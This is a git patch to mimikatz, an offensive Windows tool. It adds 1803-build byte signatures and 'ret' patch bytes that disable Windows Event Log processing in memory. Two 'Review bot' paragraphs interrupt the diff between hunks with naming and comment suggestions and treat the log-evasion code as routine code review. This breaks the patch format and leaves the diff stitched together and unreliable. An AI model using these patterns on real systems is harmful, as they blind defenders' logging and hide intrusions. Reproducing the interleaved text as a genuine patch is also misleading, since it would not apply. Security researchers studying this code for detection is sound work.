From fe6a853ec3e7ff50d79dd608dbed5e05cfab3322 Mon Sep 17 00:00:00 2001
From: Benjamin DELPY
Date: Mon, 10 Dec 2018 00:03:02 +0100
Subject: [PATCH] [new] mimikatz eventlog patch for 1803 ( for @darkoperator ) [new] mimikatz version includes maximum Windows build number tested
---
 inc/globals.h | 3 ++-
 mimikatz/modules/kuhl_m_event.c | 8 ++++++--
 2 files changed, 8 insertions(+), 3 deletions(-)
diff --git a/inc/globals.h b/inc/globals.h
index bf531bce..d43ea9c3 100644
--- a/inc/globals.h
+++ b/inc/globals.h
@@ -32,7 +32,8 @@
 #define MIMIKATZ L"mimikatz"
 #define MIMIKATZ_VERSION L"2.1.1"
 #define MIMIKATZ_CODENAME L"A La Vie, A L\'Amour"
-#define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") built on " TEXT(__DATE__) L" " TEXT(__TIME__)
+#define MIMIKATZ_MAX_WINBUILD L"17763"
+#define MIMIKATZ_FULL MIMIKATZ L" " MIMIKATZ_VERSION L" (" MIMIKATZ_ARCH L") #" MIMIKATZ_MAX_WINBUILD L" " TEXT(__DATE__) L" " TEXT(__TIME__)
 #define MIMIKATZ_SECOND L"\"" MIMIKATZ_CODENAME L"\""
 #define MIMIKATZ_DEFAULT_LOG MIMIKATZ L".log"
 #define MIMIKATZ_DRIVER L"mimidrv"
diff --git a/mimikatz/modules/kuhl_m_event.c b/mimikatz/modules/kuhl_m_event.c
index edfe95ac..c094fc96 100644
--- a/mimikatz/modules/kuhl_m_event.c
+++ b/mimikatz/modules/kuhl_m_event.c
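Review bot: MIMIKATZ_MAX_WINBUILD is introduced as a bare wide-string literal with no comment saying what 17763 stands for, and the new MIMIKATZ_FULL format replaces the words "built on" with a lone `#`, so a reader of the banner cannot tell whether the number is a build the release was tested against or a build it requires. The commit message answers that (maximum Windows build number tested), and that answer belongs next to the macro: `#define MIMIKATZ_MAX_WINBUILD L"17763" // highest Windows build this release was tested on; bump by hand when a new build is supported`. It presumably has to be kept in sync manually with the per-build tables edited in kuhl_m_event.c below, which is worth stating in the same comment.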
@@ -21,6 +21,7 @@ BYTE PTRN_WIN6_Channel__ActualProcessEvent[] = {0xff, 0xf7, 0x48, 0x83, 0xec, 0x
 BYTE PTRN_WI10_Channel__ActualProcessEvent[] = {0x48, 0x8b, 0xc4, 0x57, 0x48, 0x83, 0xec, 0x50, 0x48, 0xc7, 0x40, 0xc8, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x58, 0x08};
 BYTE PTRN_WN10_1607_Channel__ActualProcessEvent[] = {0x40, 0x57, 0x48, 0x83, 0xec, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x50, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xca, 0xe8};
 BYTE PTRN_WN10_1709_Channel__ActualProcessEvent[] = {0x48, 0x89, 0x5c, 0x24, 0x08, 0x57, 0x48, 0x83, 0xec, 0x40, 0x48, 0x8b, 0xf9, 0x48, 0x8b, 0xda, 0x48, 0x8b, 0xca, 0xe8};
+BYTE PTRN_WN10_1803_Channel__ActualProcessEvent[] = {0x40, 0x57, 0x48, 0x83, 0xec, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x50, 0x48, 0x89, 0x6c, 0x24, 0x58, 0x48, 0x89, 0x74, 0x24, 0x60};
 BYTE PTRN_WN10_1809_Channel__ActualProcessEvent[] = {0x40, 0x57, 0x48, 0x83, 0xec, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x20, 0xfe, 0xff, 0xff, 0xff, 0x48, 0x89, 0x5c, 0x24, 0x50, 0x48, 0x89, 0x74, 0x24, 0x58, 0x49, 0x8b, 0xf0, 0x48, 0x8b, 0xfa, 0x48, 0x8b, 0xd9, 0x48, 0x8b, 0xca, 0xe8};
 BYTE PATC_WNT6_Channel__ActualProcessEvent[] = {0xc3};
@@ -33,6 +34,7 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
 {KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WI10_Channel__ActualProcessEvent), PTRN_WI10_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
 {KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_Channel__ActualProcessEvent), PTRN_WN10_1607_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
 {KULL_M_WIN_BUILD_10_1709, {sizeof(PTRN_WN10_1709_Channel__ActualProcessEvent), PTRN_WN10_1709_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
+ {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN10_1803_Channel__ActualProcessEvent), PTRN_WN10_1803_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
 {KULL_M_WIN_BUILD_10_1809, {sizeof(PTRN_WN10_1809_Channel__ActualProcessEvent), PTRN_WN10_1809_Channel__ActualProcessEvent}, {sizeof(PATC_WNT6_Channel__ActualProcessEvent), PATC_WNT6_Channel__ActualProcessEvent}, { 0}},
 };
 #elif defined _M_IX86
@@ -44,12 +46,13 @@ BYTE PTRN_WN63_Channel__ActualProcessEvent[] = {0x33, 0xc4, 0x50, 0x8d, 0x44, 0x
 BYTE PTRN_WN64_Channel__ActualProcessEvent[] = {0x33, 0xc4, 0x89, 0x44, 0x24, 0x10, 0x53, 0x56, 0x57, 0xa1};
 BYTE PTRN_WN10_1607_Channel__ActualProcessEvent[] = {0x8b, 0xd9, 0x8b, 0x4d, 0x08, 0xe8};
 BYTE PTRN_WN10_1709_Channel__ActualProcessEvent[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x0c, 0x56, 0x57, 0x8b, 0xf9, 0x8b, 0x4d, 0x08, 0xe8};
+BYTE PTRN_WN10_1803_Channel__ActualProcessEvent[] = {0x8b, 0xf1, 0x89, 0x75, 0xec, 0x8b, 0x7d, 0x08, 0x8b, 0xcf, 0xe8};
 BYTE PTRN_WN10_1809_Channel__ActualProcessEvent[] = {0x8b, 0xf1, 0x89, 0x75, 0xf0, 0x8b, 0x7d, 0x08, 0x8b, 0xcf, 0xe8};
 BYTE PATC_WNT5_PerformWriteRequest[] = {0x33, 0xc0, 0xc2, 0x04, 0x00};
 BYTE PATC_WNO8_Channel__ActualProcessEvent[] = {0xc2, 0x04, 0x00};
 BYTE PATC_WIN8_Channel__ActualProcessEvent[] = {0xc2, 0x08, 0x00};
-BYTE PATC_W1809_Channel__ActualProcessEvent[] = {0xc2, 0x0c, 0x00};
+BYTE PATC_W1803_Channel__ActualProcessEvent[] = {0xc2, 0x0c, 0x00};
 KULL_M_PATCH_GENERIC EventReferences[] = {
 {KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WNT5_PerformWriteRequest), PTRN_WNT5_PerformWriteRequest}, {sizeof(PATC_WNT5_PerformWriteRequest), PATC_WNT5_PerformWriteRequest}, {-20}},
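Review bot: Renaming PATC_W1809_Channel__ActualProcessEvent to PATC_W1803_Channel__ActualProcessEvent keeps a single build number in the name of an array that, in the next hunk of this file, is now referenced by both the KULL_M_WIN_BUILD_10_1803 and the KULL_M_WIN_BUILD_10_1809 table entries, so the name is misleading for one of its two users the moment it lands and invites another rename at the next build. The x64 half of the same file already avoids this by giving its shared array a build-neutral name (PATC_WNT6_Channel__ActualProcessEvent); I would do the same here, or at minimum add `// shared by the 1803 and 1809 entries of EventReferences` on the definition. The `{-12}` offset on both new table rows is unexplained, as are the other offsets in this table, but that predates the commit. The EventReferences initializer begun here continues past the end of this hunk.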
@@ -60,7 +63,8 @@ KULL_M_PATCH_GENERIC EventReferences[] = {
 {KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WN64_Channel__ActualProcessEvent), PTRN_WN64_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-30}},
 {KULL_M_WIN_BUILD_10_1607, {sizeof(PTRN_WN10_1607_Channel__ActualProcessEvent), PTRN_WN10_1607_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, {-12}},
 {KULL_M_WIN_BUILD_10_1709, {sizeof(PTRN_WN10_1709_Channel__ActualProcessEvent), PTRN_WN10_1709_Channel__ActualProcessEvent}, {sizeof(PATC_WNO8_Channel__ActualProcessEvent), PATC_WNO8_Channel__ActualProcessEvent}, { 0}},
- {KULL_M_WIN_BUILD_10_1809, {sizeof(PTRN_WN10_1809_Channel__ActualProcessEvent), PTRN_WN10_1809_Channel__ActualProcessEvent}, {sizeof(PATC_W1809_Channel__ActualProcessEvent), PATC_W1809_Channel__ActualProcessEvent}, {-12}},
+ {KULL_M_WIN_BUILD_10_1803, {sizeof(PTRN_WN10_1803_Channel__ActualProcessEvent), PTRN_WN10_1803_Channel__ActualProcessEvent}, {sizeof(PATC_W1803_Channel__ActualProcessEvent), PATC_W1803_Channel__ActualProcessEvent}, {-12}},
+ {KULL_M_WIN_BUILD_10_1809, {sizeof(PTRN_WN10_1809_Channel__ActualProcessEvent), PTRN_WN10_1809_Channel__ActualProcessEvent}, {sizeof(PATC_W1803_Channel__ActualProcessEvent), PATC_W1803_Channel__ActualProcessEvent}, {-12}},
 };
 #endif